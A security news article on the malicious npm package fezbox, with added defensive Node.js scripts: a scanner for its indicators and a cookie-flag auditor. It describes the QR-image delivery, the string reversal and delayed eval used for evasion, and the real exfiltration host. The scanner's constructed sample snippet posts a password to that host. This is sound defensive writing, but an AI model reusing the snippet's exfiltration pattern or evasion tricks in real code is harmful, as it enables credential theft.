Fezbox: malicious npm package hides JavaScript payload inside a QR-code image

CyberSecureFox 🦊

Researchers at Socket report that the npm package fezbox used an unconventional delivery method: obfuscated JavaScript embedded inside a QR-code image (JPG) fetched from an attacker-controlled server. Before npm administrators removed the package, it had been downloaded at least 327 times, underscoring the continuing risk of open-source supply chain attacks. BleepingComputer confirms the analysis and notes that the core logic resides in dist/fezbox.cjs (version 1.3.0 in the analyzed release), which is heavily minified but reveals the malicious behavior once deobfuscated.

What happened: malicious package in the JavaScript ecosystem

Fezbox concealed instructions to retrieve a high-density QR image and then parse it to trigger a second-stage payload. While QR codes are typically scanned by cameras, this image is intentionally too dense for casual scanning and is meant for machine parsing by the package itself. This approach helps blend malicious activity into seemingly harmless image downloads.

Two-stage QR-code delivery and execution

Stage 1: Covert retrieval of a dense QR JPG

Upon execution, fezbox downloads an unusually "dense" QR-code image. Rather than encoding a URL for a human to scan, the image encapsulates obfuscated JavaScript designed to be programmatically extracted. The URL used to fetch the image is stored reversed inside the code (so the literal https:// prefix appears as //:sptth), which defeats straightforward static string matching for URLs.

Stage 2: Delayed unpacking and payload execution

After a series of environmental checks, fezbox waits approximately 120 seconds before decoding and executing the hidden script. The payload focuses on stealing cookies via document.cookie and attempts to collect username and password values if available. Collected data is exfiltrated via HTTPS POST to https://my-nest-app-production[.]up[.]railway[.]app/users. If the targeted fields are absent, the code exits quietly, reducing the likelihood of raising alarms.

Evasion, obfuscation, and anti-analysis techniques

The package evaluates its runtime environment, likely to detect development or virtualized analysis conditions and lower exposure to automated detection. It further obscures behavior by reversing strings (e.g., “drowssap” reconstructed as “password”) and by delaying execution, which can bypass time-limited sandboxing and heuristic analysis. Because the initial network call fetches a JPG, many proxies and monitoring tools may interpret the traffic as benign resource loading.

Why this tactic works and who is at risk

Embedding code in QR images hides the malicious payload inside a familiar media type, complicating both static and signature-based analysis. Teams that bundle third-party packages into client-side builds, run post-install scripts, or allow unvetted runtime dependencies face heightened exposure. Incidents such as event-stream (2018) and UAParser.js (2021) showed how quickly malicious logic can propagate via popular registries; fezbox illustrates the continued evolution of these techniques, here with a delivery channel that borrows from steganography: executable code carried inside an image.

Indicators of compromise (IoCs)

Organizations should review build and runtime logs for references to fezbox, access to dist/fezbox.cjs (notably version 1.3.0), delayed execution patterns of roughly two minutes, requests for dense QR JPG files, and outbound HTTPS POSTs to Railway.app—specifically my-nest-app-production[.]up[.]railway[.]app/users.
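The following is an added example, not code from the fezbox package or from Socket's or BleepingComputer's analysis: a small Node.js triage script that applies the indicators above to a project. It checks a package-lock.json for the package by name and version, and scans a source file for the obfuscation patterns described (reversed https:// and password strings, a setTimeout of a minute or more, eval of dynamically obtained data, and the Railway.app exfiltration host). The lockfile and the source snippet it scans are constructed stand-ins, and the list of reversed markers and the 60-second delay threshold are assumptions chosen for illustration.

```javascript
// Added example: triage a project for the fezbox indicators described above.
// Not the malware's code; SAMPLE_LOCK and SAMPLE_SOURCE are constructed stand-ins.

// Exfiltration host from the published IoCs (defanged in the article text).
const KNOWN_BAD_HOSTS = ['my-nest-app-production.up.railway.app'];

// The package stores strings reversed so a plain grep for "https://" or "password"
// misses them; reversing our own markers lets us grep for the reversed form instead.
const reverse = (s) => [...s].reverse().join('');
// Assumption: which strings to look for in reversed form (the report names URLs and "password").
const REVERSED_MARKERS = ['https://', 'http://', 'password', 'document.cookie'].map(reverse);

// Assumption: any setTimeout of 60 s or more is worth a look (fezbox used roughly 120 s).
const LONG_DELAY_MS = 60_000;

function scanSource(src) {
  const findings = [];

  for (const marker of REVERSED_MARKERS) {
    if (src.includes(marker)) {
      findings.push({ kind: 'reversed-string', detail: `${marker} (reads ${reverse(marker)})` });
    }
  }

  // Long delays before running code help outlast time-limited sandboxes.
  const delayRe = /setTimeout\s*\([\s\S]{0,200}?,\s*(\d+)\s*\)/g;
  for (let m; (m = delayRe.exec(src)) !== null; ) {
    const ms = Number(m[1]);
    if (ms >= LONG_DELAY_MS) findings.push({ kind: 'long-delay', ms });
  }

  // Dynamic evaluation is how a decoded payload gets executed.
  if (/\b(eval|new\s+Function)\s*\(/.test(src)) {
    findings.push({ kind: 'dynamic-eval', detail: 'eval()/new Function() present' });
  }

  for (const host of KNOWN_BAD_HOSTS) {
    if (src.includes(host) || src.includes(reverse(host))) {
      findings.push({ kind: 'known-ioc-host', detail: host });
    }
  }
  return findings;
}

// Locate a package in an npm lockfile. v2/v3 lockfiles key "packages" by install
// path; v1 lockfiles nest "dependencies". Transitive installs count as hits too.
function findPackageInLockfile(lock, name) {
  const hits = [];
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path === `node_modules/${name}` || path.endsWith(`/node_modules/${name}`)) {
        hits.push({ path, version: meta.version });
      }
    }
    return hits;
  }
  const walk = (deps, prefix) => {
    for (const [dep, meta] of Object.entries(deps || {})) {
      if (dep === name) hits.push({ path: prefix + dep, version: meta.version });
      walk(meta.dependencies, `${prefix}${dep}/`);
    }
  };
  walk(lock.dependencies, '');
  return hits;
}

// Constructed sample inputs (not real project files).
const SAMPLE_LOCK = {
  name: 'victim-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'victim-app', dependencies: { fezbox: '^1.3.0', 'left-pad': '^1.3.0' } },
    'node_modules/fezbox': { version: '1.3.0' },
    'node_modules/left-pad': { version: '1.3.0' },
  },
};

const SAMPLE_SOURCE = `
const u = "gpj.edoc/moc.elpmaxe//:sptth".split("").reverse().join("");
const k = "drowssap".split("").reverse().join("");
setTimeout(() => {
  fetchImage(u).then(decodeQr).then((js) => eval(js));
  post("https://my-nest-app-production.up.railway.app/users", read(k));
}, 120000);
`;

console.log('lockfile hits:', findPackageInLockfile(SAMPLE_LOCK, 'fezbox'));
console.log('source findings:', scanSource(SAMPLE_SOURCE));
```

Run it against a real project by loading package-lock.json with JSON.parse and feeding each file under node_modules to scanSource; the reversed-string and long-delay rules are heuristics and will need tuning against your own code base's false positives.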

Defensive recommendations for developers and organizations

Harden your supply chain posture: pin dependency versions using lockfiles, remove unused packages, prefer vetted mirrors, and employ software composition analysis (SCA). Review post-install and runtime scripts; consider building with policies that restrict execution of untrusted scripts.

Protect authentication data: set cookies with the HttpOnly, Secure, and SameSite flags. HttpOnly removes the cookie from document.cookie, so a payload like this one cannot read it even when hostile JavaScript runs in the browser. It does not stop injected script from issuing requests with the victim's session, so treat it as a mitigation for cookie theft rather than for client-side compromise in general, and never store usernames or passwords in cookies at all.
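As an added example (not from the article or any of the cited analyses), here is a small Node.js audit of Set-Cookie headers for the three flags above, together with a rewriter that turns a weak header into a hardened one. The headers it checks are constructed samples; the rule that flags cookies named username or password is an assumption based on the fields the payload went after.

```javascript
// Added example: audit Set-Cookie headers for HttpOnly, Secure and SameSite,
// and rewrite a weak header into a hardened one. Sample headers are constructed.

function parseSetCookie(header) {
  const [nameValue, ...attrs] = header.split(';').map((p) => p.trim());
  const eq = nameValue.indexOf('=');
  const name = eq === -1 ? nameValue : nameValue.slice(0, eq);
  const attributes = {};
  for (const attr of attrs) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    attributes[key] = i === -1 ? true : attr.slice(i + 1); // bare flags become true
  }
  return { name, attributes };
}

function auditCookie(header) {
  const { name, attributes } = parseSetCookie(header);
  const problems = [];
  // HttpOnly is the flag that keeps document.cookie from returning this cookie.
  if (!attributes.httponly) problems.push('missing HttpOnly: readable through document.cookie');
  if (!attributes.secure) problems.push('missing Secure: may be sent over plaintext HTTP');
  const sameSite = typeof attributes.samesite === 'string' ? attributes.samesite.toLowerCase() : null;
  if (!sameSite) problems.push('missing SameSite: behaviour depends on browser defaults');
  else if (sameSite === 'none') problems.push('SameSite=None: sent on cross-site requests');
  // Assumption: a credential-looking name means a secret that should not be in a cookie at all.
  if (/^(username|password)$/i.test(name)) problems.push('credential stored in a cookie: keep it server-side');
  return { name, problems, ok: problems.length === 0 };
}

// Keep name=value and scoping attributes, add the three flags, preserve a strict
// SameSite if one is already set, otherwise default to Lax.
function hardenSetCookie(header) {
  const [nameValue, ...attrs] = header.split(';').map((p) => p.trim());
  const scope = attrs.filter((a) => /^(path|domain|max-age|expires)=/i.test(a));
  const sameSite = attrs.find((a) => /^samesite=(lax|strict)$/i.test(a)) || 'SameSite=Lax';
  return [nameValue, ...scope, 'Secure', 'HttpOnly', sameSite].join('; ');
}

// Constructed sample headers.
const SAMPLE_HEADERS = [
  'session=abc123; Path=/',
  'session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax',
  'password=hunter2; Path=/; Secure; HttpOnly; SameSite=Strict',
  'tracker=x; Secure; HttpOnly; SameSite=None',
];

for (const h of SAMPLE_HEADERS) {
  const result = auditCookie(h);
  console.log(result.ok ? 'OK  ' : 'WEAK', h, result.problems);
  if (!result.ok) console.log('     hardened:', hardenSetCookie(h));
}
```

In a real deployment the headers come from your own framework's responses (a quick check is to capture them from a staging environment and feed each Set-Cookie line to auditCookie); the hardening step is best done at the framework's cookie-options level rather than by rewriting headers in flight.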

Strengthen CI/CD and egress controls: isolate build pipelines, adopt deny-by-default policies for outbound traffic, log network access, and block unknown endpoints. Monitor for anomalous image fetches followed by dynamic code execution or unexpected POST requests.

Practice continuous dependency hygiene: regularly audit dependencies, track transitive packages, and adopt least-privilege principles for libraries included in client bundles.

Fezbox is a reminder that adversaries continue to refine supply chain tradecraft, exploiting overlooked channels like image retrieval to hide code delivery. Teams should validate whether fezbox was present in their projects, inspect network logs for requests to Railway.app endpoints, and ensure session cookies are protected with HttpOnly. Combining strict dependency controls, hardened cookie policies, and monitored egress paths significantly reduces the blast radius of similar npm-borne threats.
